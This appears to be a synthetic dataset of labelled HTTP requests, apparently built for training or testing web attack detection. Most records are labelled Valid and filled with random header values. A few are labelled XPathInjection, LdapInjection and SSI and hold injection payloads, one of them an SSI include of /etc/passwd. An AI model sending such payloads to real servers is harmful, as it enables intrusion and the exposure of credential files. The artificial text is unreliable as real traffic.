X-Serial-Number: 2418413
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21341
Start - Id: 31778
class: Valid
GET /_tpscskI/exzkOCE/yH/cc8lFI5sZn42cPZ8./pmH-Sp/dugoahrds/tXHlA/uueouoxye/TWYwVyeval0Z9.swf?6.YautoexecDbin8kY37-=nFxi7JrYUi&UEnG=t2mL&rraeHttq=6073&tirrQe=Hesccfo&openi-0=sneOa&eeIahe0u1rt=s2srIe4 HTTP/1.0
Host: 115.229.15.38:4513
Connection: uhyicng8
Accept: */*
Accept-Charset: windows-1258, cp-936;q=0.7, hz-gb-2312;q=0.6, iso-8859-8-i
Accept-Encoding: identity;q=0.1, compress, deflate;q=0.9, identity, gzip;q=0.7
Accept-Language: c-a;q=0.3, e7Irz9r-o0ne, oarab-uanix9et, ooo3oor-ietm
Cache-Control: no-transform
Client-ip: 45.140.255.145
Cookie: uJahWM-=p4hOEf1H1k;V9iidt0Tms=nRn;qobnscl=aAvOSJb6;Tna= yresaupg;qed6aL=5;gOZzhd=Hdf
Cookie2: $Version="45"
Date: Fri, 29 Jun 07 03:42:39 UTC
ETag: "wQiWX@C2374Hy9I"
Expect: 100-continue
From: o58tOaQr@asxayh.com
If-Modified-Since: Sun, 03 Feb 08 23:38:05 UTC
If-Unmodified-Since: Tue, 14 Jul 09 17:34:02 CET
If-Match: "paRUP1rXoJSsjs5724u"
If-None-Match: "@tilC1Y5FhXh1hG"
If-Range: Thu, 19 Nov 09 01:39:59 CET
Max-Forwards: 0690
MIME-Version: 6.8
Pragma: o='o70tcto'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic ZmhodFQ6N3J0U2Rl
Range: 1512-
Referer: /etnlhg/Va84nq.mdb
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/7.2 (X11; U; Linux i586 7.2; et-es; rv:2.6.0) Gecko/79290329
UA-CPU: 68000
UA-Disp: 423,7753,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7261x084
Via: eyeT/0.4 www.REiee2l.jpg:43472, gGsO/2.4 38.214.39.150:7, 1.8 www.i9aoehve.js
Transfer-Encoding: identity
Upgrade: ybni/1.7, iatis/2.4, eyT/2.8, axs9vh/7.2
Warning: 838 153.229.81.192:1 "ewsrAvd6" 
X-Forwarded-For: 99.24.216.147
X-Serial-Number: 995299594
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31778
Start - Id: 26095
class: Valid
GET /mPw9N-6TE1L5EN_7_/eYsxHQW@g2/81NNax7qBIkaa2W/e2/Qsystem4jt5SC1.swf?rcreea5eP=Sem&ppopen5Lkurcp74-=hoipedswtoesuys&hi9frdwC3amGt=992&srEBemqf=r&neerdnhatV=passwdd3i&oefarIl=t21pc95&mafiteiuodmnlt=9&hg=alnsu0eqeebnsos&JVFTKrZ0aK9=i%27lcegsi%40+eDim%29n&yeieyswH=n3teeueoI2s&XyRVsNXnccm=05708671&xhxlibg1=15589785 HTTP/1.0
Host: 27.21.149.88
Connection: keep-alive
Accept: application/*, application/x-tar;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.4, deflate, identity;q=0.4, deflate, identity
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 104.91.44.192
Cookie: voxzpplnrP=144;krreLa4En=ihbfdc9c
Cookie2: $Version="1"
Date: Mon, 12 Feb 07 06:25:27 CET
ETag: "Ql9OThmryf.DkekWJs"
Expect: 100-continue
From: onjJtaeo@rtkFe9o2gi.st
If-Modified-Since: Sun, 18 Sep 05 17:06:51 CET
If-Unmodified-Since: Thu, 12 Nov 09 02:43:25 GMT
If-Match: *
If-None-Match: "64VQhf2uae--9MvNPENC"
If-Range: Tue, 08 Jan 08 15:42:43 CET
Max-Forwards: 007
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest uri=http://tehX8m.it/7nfoxbtj/obi9n.gif
Authorization: Basic YWNvb3I6b3dxbg==
Range: -41,2933-4708,1-5204
Referer: /ex5tuRt/eqih/tinwn/etotdPaA/eghts.css
TE: trailers
Trailer: If-Range
User-Agent: e40f5XeQMg http://www.isie.ch
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 096x0326
Via: 2.8 www.wrEsAust.gif, uisrt/2.0 www.dnhtlip.jpeg
Transfer-Encoding: deflate
Upgrade: snTl/7.8, mlgvw4/0.1
Warning: 624 www.0t7ct.css "Ahem" 
X-Forwarded-For: 129.2.245.208
X-Serial-Number: 07602073887440146
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26095
Start - Id: 23264
class: Valid
GET /hRMgOl@Dv-3zxcnwWC/gHEYPa8_NDII1/essgtnaerSrelywFu/eAOrZIfw@.js? HTTP/1.0
Host: 101.177.80.114
Connection: close
Accept: video/quicktime, audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: teo=mdioeiz
Client-ip: 63.155.215.81
Cookie: uTixwgetB-ls-G=aeoafTlA0niotsoi
Cookie2: $Version="481"
Date: Sun, 19 Nov 06 19:19:25 GMT
ETag: "2@ut8TgWDk520dACYX5"
Expect: 100-continue
From: aFofh@flsmtees.ch
If-Modified-Since: Fri, 19 Mar 10 21:50:10 UTC
If-Unmodified-Since: Sun, 22 Jul 07 16:09:19 CET
If-Match: *
If-None-Match: "6Dl1QpYQmYNHA-HC.Veh"
If-Range: "8@WOqR9pKFd_X3AQ"
Max-Forwards: 793
MIME-Version: 4.6
Pragma: niTqla=blnt
Proxy-Authorization: Basic ZWFlbHRpdDppbmVkZm8=
Authorization: 53nnsy seswhh2N=eotZs
Range: 36-367,16-
Referer: http://www.eArewout.be/etsnlsCh/oesa/aloonla.mpeg
TE: trailers,deflate;q=0.6
Trailer: User-Agent
User-Agent: y1etslqr/1.4
UA-CPU: MIPS
UA-Disp: 7288,4441,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6614x1041
Via: HTTP/6.1 44.183.126.65, FTP/2.7 www.rNit.css:038, 0.0 www.chsDoin.jpeg
Transfer-Encoding: deflate
Upgrade: atinoz/5.3, liht/0.8, qeeon/5.8, aucer/1.3
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 55.67.110.255
X-Serial-Number: 736748310370
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23264
Start - Id: 49907
class: XPathInjection
GET /ehuf/5eornaarohiiZdteaerE/ew0nOCO8M7qZZNGU7/eiaewQI/hgtaguntarsLroPdyd.sh?odlnroeirvre=ecThgsnNjltgok&1yal1hnid=Nwlleas%27+or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+++%27fe%27++++%3D+++%27&osc=1&aaeCleso=d4eirh&5fxz-4ZnetcVB=3e HTTP/1.0
Host: 174.143.201.149:3334
Connection: mEe4me0
Accept: application/postscript;q=0.3, application/postscript;q=0.5
Accept-Charset: iso-8859-4;q=0.7, iso-8859-5;q=0.7, windows-1255;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: enitZ-ots;q=0.0, p-Tn9oqeqs;q=0.8
Cache-Control: no-transform
Client-ip: 46.208.216.230
Cookie: 9LtelnetdH=awnoehOs;_RPdb=an>ti);oecer=te%%o/laccepti7dsv;7oztri=altsee0wneRtr=8crw;Crgestte1edglj=c@S-wnTagit
Cookie2: $Version="615"
Date: Mon, 19 Apr 04 05:02:12 CET
ETag: "-PkzT_C75R64usx5m"
Expect: 4rzr
If-Modified-Since: Mon, 20 Jul 09 22:26:40 UTC
If-Unmodified-Since: Sat, 26 Jul 08 13:29:45 GMT
If-Match: "VgRM.hzWFWwvjV@43"
If-Range: Fri, 15 Jul 05 05:42:04 GMT
Max-Forwards: 0865
Pragma: ioe='ft'
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: ia3b sara=5iwwpoh5
Range: 66338-
Referer: http://petyE.st/u2tr8tdt/fat3en/tori.bin
User-Agent: pyli9suyqstirsstn4Pe
UA-Disp: 7061,246,32
Via: 3.1 173.146.101.38
Transfer-Encoding: deflate
Upgrade: mbtii/3.9, teUb/8.8
X-Serial-Number: 70298520558
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49907
Start - Id: 2455
class: Valid
GET /oetMRa/8oyuBtce1xIi0BKIWq/mnmtssidaFuwr8c2C/o3nEVZFr-yjQoV8mwOGB/uA0G7BRnb/F@yPcopyr/emv6/i2Rteripeitcrta/jd.L1hg/frxgetd5ut.jpg?wsas=arip&0g9ec0eTpstt0l=uhloHltguhm&ode=499&neRytzuuse0a=10706&trssneg4Ft=ie&1oosft0tSRaojSs=8t HTTP/1.1
Host: www.ubiai.it
Connection: xatesEa
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip
Accept-Language: hrpcUeaj-il, S-n0cht, shin-9ese6ql;q=0.7, igslhh-a4l, eSaksnli-sed;q=0.4
Cache-Control: m='akTrRvHh'
Client-ip: 145.221.22.76
Cookie: 78tHa9toss=sZu4Wi3vhV.;awyh8geaRps4=avbscripti r
Cookie2: $Version="76"
Date: Sun, 18 Oct 09 08:19:03 GMT
ETag: "MQ_lYq9ALvF956atDVNI"
Expect: 100-continue
From: 0s8tX@arsT.cz
If-Modified-Since: Tue, 04 Dec 07 12:04:35 GMT
If-Unmodified-Since: Sun, 27 Nov 05 11:21:44 CET
If-Match: *
If-None-Match: *
If-Range: "e6BYd0ekkhf6b0lNvMRd"
Max-Forwards: 185
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: ntaw7o tt7Lty8=1tmeaxs
Authorization: NTLM VG9qb3NzdDdzdGRsd2xUZ25oeWoxaHI4b2JheWkyU3NudWU2bGw4aQ==
Range: 87817-,2898-
Referer: /bwrzi/Nsdaon/tbbooR/tu0J2.doc
TE: chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 4.9; 7r-5l; rv:9.7.2) Gecko/34618101
UA-CPU: x86
UA-Disp: 097,5060,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 900x5240
Via: 0.9 www.srhB.gif, HTTP/1.7 20.158.248.249
Transfer-Encoding: pEv7
Upgrade: eentc/2.6, mSansn/5.8, rrshto/6.6, NizNs/4.7
Warning: 416 www.pteq.html "largswoidrewai" "Wed, 11 Aug 04 24:11:21 GMT"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 802306505768249437
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2455
Start - Id: 10707
class: Valid
GET /gSpblcCspCB6HmTF/rjr4otEyuoy/lqFlreplace6Jmocha/7mImetbi23h/aoqbWUYfRsl1gTYS/tlnouwmVevrfoantoOb.php3? HTTP/1.0
Host: 81.24.0.20
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-7, iso-8859-4;q=0.0, iso-8859-8-i, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 123.186.199.25
Cookie: ene2hseoxyo=[Dtuspse? orriieB85;rHDaWghyttrm=aS-Brzie;cmxoaePOt9=we;uuftinp=goiseiur2jt4pon1;tSiN=hi?alinknNMto'N e;wschildhG=wtd
Cookie2: $Version="097"
Date: Wed, 20 Feb 08 22:51:33 GMT
ETag: "WUg9JirefD8v_q3MzuXi"
Expect: eocns=iylibw
From: apymaii@Pdts.net
If-Modified-Since: Sun, 14 Oct 07 11:15:57 CET
If-Unmodified-Since: Sat, 12 Jul 08 12:58:17 GMT
If-Match: "-Lw6BhFmsQ331YmDkZF"
If-None-Match: "K-2phcN5XOsORF985yFN"
If-Range: "eE5txkx6fWT6zZ0w_D5F"
Max-Forwards: 546
MIME-Version: 7.4
Pragma: m5i='we7ci9'
Proxy-Authorization: Digest nonce
Authorization: Basic ZTFvZWU6ZmF3YTQz
Range: 569080-9470,36135-,7-
Referer: http://raene.com/swlceea/O3nahlsm.dll
TE: deflate;q=0.3
Trailer: If-Range
User-Agent: enow/4.1
UA-CPU: 68000
UA-Disp: 8769,6775,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 060x417
Via: 9.9 194.224.73.71, 2.8 24.199.118.36
Transfer-Encoding: tIo2t; cztphei=tneuR
Upgrade: e0Tk/8.6
Warning: 733 85.32.151.90 "MQtmgt57qqbafdmyE" 
X-Forwarded-For: 87.119.214.253
X-Serial-Number: 39073163652713
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10707
Start - Id: 21883
class: Valid
GET /laeycwEwzbtp6e/nmH9-/eGfNe9XQ5.4/psspuil/MwgeteH/OzQ.jpg?Etlu=rape%25ny&himtchhs=5&Eie6coaSLMc=nawp-&lnhrriuaeo1=02154802&HuviGC0Gvar=6703891243&enPsiadaqsch=7287119&hmetoargpt=tlfkU9dBY&aGuno=ec9eid&8el=888&ghatrcateu=inlsmmv0auorspruile&VaUVPPgY9gw=cJ3%40agYipK&tielDedmb5D=719950 HTTP/1.1
Host: www.dnou.biz
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.2, windows-1258;q=0.6, big5;q=0.2, x-mac-japanese
Accept-Encoding: 
Accept-Language: sRc-yRea, xdt-aTti, sc1tz-cnriHr;q=0.8, aa-chsxsaef, r-S
Cache-Control: min-fresh=34502
Client-ip: 118.247.221.198
Cookie: 50rLZAmeta90F=8520434;YGff8insertmetahtaccesxzj=4682
Cookie2: $Version="599"
Date: Fri, 07 May 04 14:11:25 UTC
ETag: "fyqs5Qx@yMaGeCdjwq"
Expect: ohTw2=3Sm4tlko;zoeayq
From: gspde@ia3eGzume.be
If-Modified-Since: Mon, 27 Oct 08 16:58:34 CET
If-Unmodified-Since: Sat, 21 May 05 01:14:35 UTC
If-Match: *
If-None-Match: *
If-Range: "ge6XUtF4MBe.-9Z"
Max-Forwards: 98
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: iele gsycpn=cveretgu
Authorization: NTLM b212ZnRzQ2lzbGlDNjJ6MGRvbmNybnlhdHNpSG9FaXlFZnlzZGFy
Range: -34244,001-
Referer: /jhaQwe/dhrh0le.cgi
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/2.2 (Windows; U; Windows NT 4.1; po-le; rv:9.3.5) Gecko/66783537
UA-CPU: StrongARM
UA-Disp: 649,1976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 196x452
Via: royg/6.7 95.191.140.210, Odtnn4/7.6 www.t0tla.css, 8.5 www.eLshuec.tiff
Transfer-Encoding: compress
Upgrade: cuSa/4.1, ehd/3.9, ecn/7.5
Warning: 810 48.19.38.105 "wocweaael2R4t" "Mon, 17 Nov 08 22:16:35 GMT"
X-Forwarded-For: 182.115.130.238
X-Serial-Number: 0932215457430057404
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21883
Start - Id: 25242
class: Valid
GET /wEwchndtreBncn/insert3-7R/qwoxE97h9bgsoundRPnqP/it/1XfaYw@A/advgnkmoetsl/6qpmCme/aZgIhae5henPe/nfaduloza.exe?ittrsoiaxfme=wckmetcrartrisz&wtbXzyrnr6t=83218 HTTP/1.1
Host: 206.117.176.42:80
Connection: ezres
Accept: image/*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: ia-Gr, ebre-rhuRi;q=0.5, Okite-a;q=0.2, eae-ysSe
Cache-Control: min-fresh=85
Client-ip: 118.12.14.153
Cookie: hlt8nlrtist= fv6thuos3ZayS wm;hsra=h0ke4ilin;7Oe=0753555;e8swhhrsyhwht6g=t&amwhnsystem;KO-J=etba;f4sock_streamzOBaG=st-yNFy
Cookie2: $Version="146"
Date: Sat, 05 Jan 08 20:36:25 CET
ETag: "xl85t3V8Xuwd3Z.Zb"
Expect: pni49rtt
From: k4NgNry@tf92Cos.be
If-Modified-Since: Sat, 07 Jun 08 24:06:02 CET
If-Unmodified-Since: Mon, 24 Apr 06 24:34:21 CET
If-Match: *
If-None-Match: "Q-HKpZc0jnvW8ry8CL"
If-Range: Thu, 07 Jan 10 17:59:26 UTC
Max-Forwards: 5
MIME-Version: 3.2
Pragma: o1=anhrd
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic WG5wcjplYXRp
Range: 95085-,-05
Referer: http://acneeTi.be/aSde2tC/E6fzehst/euwi/raLoe/oRLrbnR.doc
TE: gzip;q=0.6,chunked;q=0.5
Trailer: Trailer
User-Agent: hdjasatc (1-gyCSGHe; 5t79HNNV; s4WCQTpk; nv3ECYDS5; wscgtB_)
UA-CPU: PowerPC
UA-Disp: 703,702,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 765x9448
Via: 9.7 www.ryeoqrKt.html, FTP/1.8 33.149.3.145, 4.4 145.214.120.237:409
Transfer-Encoding: gzip
Upgrade: 1oew6/6.7, 13a/4.7, aismae/7.4
Warning: 918 55.192.214.218 "yrea68tpe" "Wed, 13 Jan 10 14:40:57 GMT"
X-Forwarded-For: 128.219.12.193
X-Serial-Number: 355160379643379
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25242
Start - Id: 13702
class: Valid
GET /hBNl1/Gdp9TH/otsehasila5msrippj/Jsa2L0GwCusrg8618.asmx?1dvJrD=etftikbyM&ET6tb=skl4Ae9&a1Eshs=hh8weomrea+ieE HTTP/1.0
Host: 147.62.87.15:0
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 8.253.133.52
Cookie: tuthatrpTshr=LLl-oOeln;gi0lifeete=N ;sps=01485;Loatlmc='oio;veVDf3Iv8GSN=6777707;8n=einsertoW6yaechoreHea1Ttt ae
Cookie2: $Version="554"
Date: Tue, 13 Dec 05 07:02:39 UTC
ETag: W/"We_Dnx@r6z6uw4hOkIpS"
Expect: 100-continue
From: s29eksF@wcAom7est.fr
If-Modified-Since: Mon, 22 Oct 07 19:35:32 CET
If-Unmodified-Since: Wed, 01 Oct 08 19:39:58 GMT
If-Match: "SFI6nCGASwXQbBgP"
If-None-Match: *
If-Range: Wed, 13 Apr 05 24:43:24 UTC
Max-Forwards: 138
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: sinane Id8nwt=6eipE
Range: -2
Referer: /xstgbuR/eEnby4r/deiu.mdb
TE: chunked,trailers,gzip;q=0.3
Trailer: Accept-Language
User-Agent: sauaid (txTPRby)
UA-CPU: PowerPC
UA-Disp: 146,6247,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 757x935
Via: 1.3 69.142.201.137
Transfer-Encoding: axhait; asdz=nwHndA2q
Upgrade: eeelg/7.7, utMy/3.6, isxk/2.7, aitvl/7.3
Warning: 963 www.nr6uio.htm "hGclte" 
X-Forwarded-For: 15.76.96.210
X-Serial-Number: 1852790108043394492
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13702
Start - Id: 32699
class: Valid
PUT /ahr3ntsne2dEnqiden/hbncedwLw/um/an7adflejzeehJnh/ArxmlZoUJx/0dsrehcMfew9rmu53O/eLUFb1hd/rb/dn.jpeg? HTTP/1.1
Content-Length: 204
Content-Language: tlboen,fc,7aohtoE
Content-Encoding: compress
Content-Location: /an7zo/esH6daeH/hoeeunEs/js5avel/ed3Ossid.png
Content-MD5: eGVla2ltaGRlc3R4YUVoVA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Nov 08 23:23:52 GMT
Last-Modified: Mon, 10 Aug 09 24:17:03 GMT
Host: www.nbted3aIO.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.3
Accept-Encoding: gzip, deflate, deflate;q=0.7, compress, compress;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 8.228.19.152
Cookie: lrbiefbgfcsZnn3=tQqrwZkoo;hopenzKreplace=tUb;Dtoceid1=tvkXRU9@FY
Cookie2: $Version="25"
Date: Thu, 15 Jul 04 06:06:53 UTC
ETag: W/"Z-E63Eov10fSRQJm"
Expect: 100-continue
From: tnTmch@jgcsnn9n.de
If-Modified-Since: Fri, 09 Dec 05 05:05:21 UTC
If-Unmodified-Since: Tue, 07 Jun 05 17:44:17 UTC
If-Match: *
If-None-Match: *
If-Range: "ahErFR7IX2d398RGV"
Max-Forwards: 759
MIME-Version: 9.9
Pragma: igtprOds=o
Proxy-Authorization: nestv tja1hRn=cehh
Authorization: 5sw8 xroouN=Txye
Range: 08-42,29612-1
Referer: http://8ysrDman.gov/Sngrv.cfm
TE: chunked,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/8.2 (Windows; U; Windows NT 0.3; wR-e8; rv:2.3.0) Gecko/95152407
UA-CPU: MIPS
UA-Disp: 6104,859,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1210x8264
Via: HTTP/5.2 www.3eqEpe.jpg:5480, 3.7 www.dT01.css, 1.9 204.247.143.87
Transfer-Encoding: identity
Upgrade: ercu/0.8, 0hiEfa/9.7, iMd25D/0.0
Warning: 005 www.6kodye.shtml "hgKii4eedeUze" "Mon, 11 Apr 05 23:01:11 GMT"
X-Forwarded-For: 130.40.193.83
X-Serial-Number: 590618
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8acktisru=niT&reanH=d4d5AD&rgefsoYH3nar=14&li=ulri &hadA=32&earunnCt3nUt=695552&tEfagnt=4151&saljehek4989Ic=yn&3QgpositionTg=515&otxp=finedirl&titmz9him6ypeg=ycm3Hlc.aNPz&re=4890989&_Fp0a8N=98701&p8S_h=10

End - Id: 32699
Start - Id: 8710
class: Valid
GET /zP0bvEbAMPaU3/exvABoO6a2Uc8a/tycbqpnstl5eab/lwvTcwn6zHyjtgrZjyF@/ohyOBK/nm/YAcC0KkJDweP/ifQ8IrrZ7PePVAk0K/itytifdait/Qt9rTxtmrels.exe?eylceectbgr=72&eopmeiSiaouals=qet&aew=ooisamnzne%3A4ntmpssock_stream4nH2&i0tgc=3687&arqeeojiuntre=gBdWezR&Atehnoiscduzoo=rgrfieie0Ft&2isyuqQ=72084&AglsNhd=vbscriptise&HqBMbsam6=iG9ta%40y&mr=eclPtu%24&ipNeposcuekh=osAac0eexec+twpasswd%7EMast HTTP/1.1
Host: 85.78.209.98:83825
Connection: oAwesEm
Accept: video/*, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rhes-tqflooo
Cache-Control: no-cache
Client-ip: 102.116.226.199
Cookie: aohsc7od4=childJg;XCxUwBbYYX=98816537;2ahisusari=tw;lot3mu4=34406867
Cookie2: $Version="214"
Date: Mon, 05 Apr 04 19:07:56 GMT
ETag: W/"523XUmdqpc-jhLpY7"
Expect: 100-continue
From: mteeb@o92wOhll.cz
If-Modified-Since: Tue, 10 Jun 08 07:11:05 GMT
If-Unmodified-Since: Tue, 09 Nov 04 18:23:12 GMT
If-Match: *
If-None-Match: "dU1xvdHR0ooGqYo"
If-Range: *
Max-Forwards: 757
MIME-Version: 9.4
Pragma: itUws=phoay
Proxy-Authorization: as9ct dmdsne=vmoz7nhe
Authorization: Basic dG9iaGNucGE6dHNwdHRyYQ==
Range: -1251,-8,78356-
Referer: /fnoff.doc
TE: trailers,chunked;q=0.7
Trailer: TE
User-Agent: Mozilla/0.3 (X11; U; Open BSD i386 0.9; sn-ic; rv:6.2.1) Gecko/22430658
UA-CPU: PowerPC
UA-Disp: 232,8608,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 559x025
Via: 7.7 www.ythoa.gif, HTTP/1.0 www.fIntegup.shtml
Transfer-Encoding: vpmoTd
Upgrade: t6hhg/7.3, iEEkud/1.6
Warning: 722 191.87.245.62 "ldhaa3etlrseAcnvoe3a" "Fri, 03 Dec 04 20:48:39 CET"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 23222
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 8710
Start - Id: 38767
class: LdapInjection
GET /fHa/gpassthrukwcM/rvN/dQWWEK_.Da6k/iZb2r@PLKzOCI5wWWal/tNHCkW03cGl.htm?Stmp1Tymphp6fYk=58&Epen=8432%29%28%26%28objectClass%3Dwtst%29%28%7C%28sn++%3D+pt7%29%28cn%3Deeiy+++J*%29%29 HTTP/1.1
Host: www.ttootcs.cz:75
Connection: keep-alive
Accept: image/gif;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: r-efCno4uo, tv5xxac-sn, oswieb-Yya6i
Cache-Control: no-cache
Client-ip: 156.223.39.67
Cookie: GRa=ate16tibiiss;thGsee8a=(esws;inputpSp3=9536869;na=ssd5eaxo;onaCE=divlqaOsock_streamiiM;wexr214af81=lR
Cookie2: $Version="1"
Date: Wed, 10 Mar 04 11:10:15 UTC
ETag: W/"JGyuh3.3J58-vPmC"
Expect: 100-continue
From: 0seAs@thoats.st
If-Modified-Since: Fri, 09 Jan 04 07:10:08 UTC
If-Unmodified-Since: Fri, 23 Apr 04 05:46:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: edzh nuUs2osn=ijuohy
Range: 7-
Referer: /fSiRn/Utguaat/tesgnii/ssaeere.js
TE: trailers,gzip;q=0.1,trailers
Trailer: Date
User-Agent: hreEmtEe/9.2.2.3
UA-CPU: Sparc
UA-Disp: 1821,609,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 343x5234
Via: 0.0 www.tMdXr2.shtml
Transfer-Encoding: gzip
Upgrade: Niea/4.1, tgdad/3.0
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 99237184639
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38767
Start - Id: 11641
class: Valid
GET /gotdteg7n/tsvtilB2IT8/nE0N2tXj/iLmDqESkLcK6_NW/thaoeteozai/tltkce/o4I6fD/PW.execn/9nuzi1GeRx0KgIit/ekC/wDR7v9Tn2J/hKuVHV8LGzsUKqvrxR.tiff?rpEhsu=97&CPupdateDEinGQ=028697&a8c=sslzbn%5Deit3 HTTP/1.1
Host: 80.82.120.59:80
Connection: pteiTme
Accept: video/*, application/*;q=0.2, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: sf9mD7n-drldgt
Cache-Control: max-age=37
Client-ip: 37.192.196.13
Cookie: dtMrpcaoa=1
Cookie2: $Version="3"
Date: Tue, 23 Feb 10 17:03:27 UTC
ETag: W/"RuresPYWF9PlPtUYTR"
Expect: 100-continue
From: yspI@eunniwes.st
If-Modified-Since: Sun, 25 Mar 07 08:45:41 GMT
If-Unmodified-Since: Wed, 25 Feb 09 16:56:02 CET
If-Match: "iCga_b7vfPwNGAgd@"
If-None-Match: "wKl_m-ZsJZvqysH"
If-Range: Sun, 10 Jan 10 12:17:38 CET
Max-Forwards: 767
MIME-Version: 8.2
Pragma: gn='etf'
Proxy-Authorization: Basic a3J2Y3RhWTpPZXR0YmQ=
Authorization: tgons ts1e=iawiekiv
Range: 65856-187
Referer: http://sa5jneg.cz/RyitHD6/cst24h/aCna/gsx7elpe.exe
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 1.6; it-Eg; rv:5.0.5) Gecko/65246970
UA-CPU: PowerPC
UA-Disp: 3478,401,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3585x2586
Via: HTTP/1.2 128.20.23.226, HTTP/2.0 www.looaet.html, FTP/8.9 www.jncd.gif
Transfer-Encoding: deflate
Upgrade: evr/0.8, eendoi/2.0, ahl/7.0, tirUw/6.8
Warning: 857 www.weac.gif "Cdlyhd" 
X-Forwarded-For: 14.236.62.116
X-Serial-Number: 046539438868930
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11641
Start - Id: 39515
class: SSI
GET /4srN9m/ncMeRR/ALw6Dr@Yqsghttps/0lKNRQfJ-sU5Fv/lSpasswd1Z1JFO/nise0iruuwasq2nE/DeghttpGiqMP/4tN_xMw3-6Luotc-7/sB0Hdivcf/aPyeb77c_H-Ua/s6jcD.php4?iyteagl3it=snr%3Brrn+P0%3Agroup+by&ocsnntnratt8nar=yel9optostattor%25ltct&iytwTl=38918021&pRh=iYbrxbfqxrealSpnaa&bactom9c=xaaah&BT5-WhTLVM=-o&iott19sbAt4ud=39513681&cmtgtzygrsotci=unionr%27vary&scriptf5y5j6=9185&Q.CitPdmA=930110 HTTP/1.0
Host: 107.67.120.63
Connection: close
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tkcnbveo-nltehe;q=0.2, mrag-hzcjzd6i
Cookie: Ax_C=<!--     #include virtual="/etc/passwd"     -->
If-Modified-Since: Mon, 20 Sep 04 08:43:59 UTC
If-None-Match: *
Max-Forwards: 96
